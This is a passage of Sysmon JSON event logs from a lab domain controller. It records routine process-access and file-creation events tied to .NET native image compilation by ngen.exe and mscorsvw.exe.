{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8299,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:07.372\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0523-5F25-0000-0010FCA11300}\r\nTargetProcessId: 1200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:07.372","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0523-5F25-0000-0010FCA11300}","TargetProcessId":"1200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8300,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:07.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0523-5F25-0000-0010FCA11300}\r\nTargetProcessId: 1200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:07.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0523-5F25-0000-0010FCA11300}","TargetProcessId":"1200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8301,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:01:07.778\r\nProcessGuid: {A837DB8D-0523-5F25-0000-0010FCA11300}\r\nProcessId: 1200\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\4b0-0\\System.Runtime.WindowsRuntime.dll\r\nCreationUtcTime: 2020-08-01 06:01:07.778","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:01:07.778","ProcessGuid":"{A837DB8D-0523-5F25-0000-0010FCA11300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\4b0-0\\System.Runtime.WindowsRuntime.dll","CreationUtcTime":"2020-08-01 06:01:07.778","EventReceivedTime":"2020-08-01 06:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8302,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:07.825\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FB-5F25-0000-001059621200}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:07.825","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FB-5F25-0000-001059621200}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8303,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:07.825\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FB-5F25-0000-001059621200}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:07.825","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FB-5F25-0000-001059621200}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8304,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:07.840\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0523-5F25-0000-00107AA61300}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:07.840","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0523-5F25-0000-00107AA61300}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8305,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:07.872\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0523-5F25-0000-0010CEA91300}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:07.872","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0523-5F25-0000-0010CEA91300}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8306,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:07.872\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0523-5F25-0000-0010CEA91300}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:07.872","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0523-5F25-0000-0010CEA91300}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8307,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:07.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0523-5F25-0000-0010CEA91300}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:07.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0523-5F25-0000-0010CEA91300}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53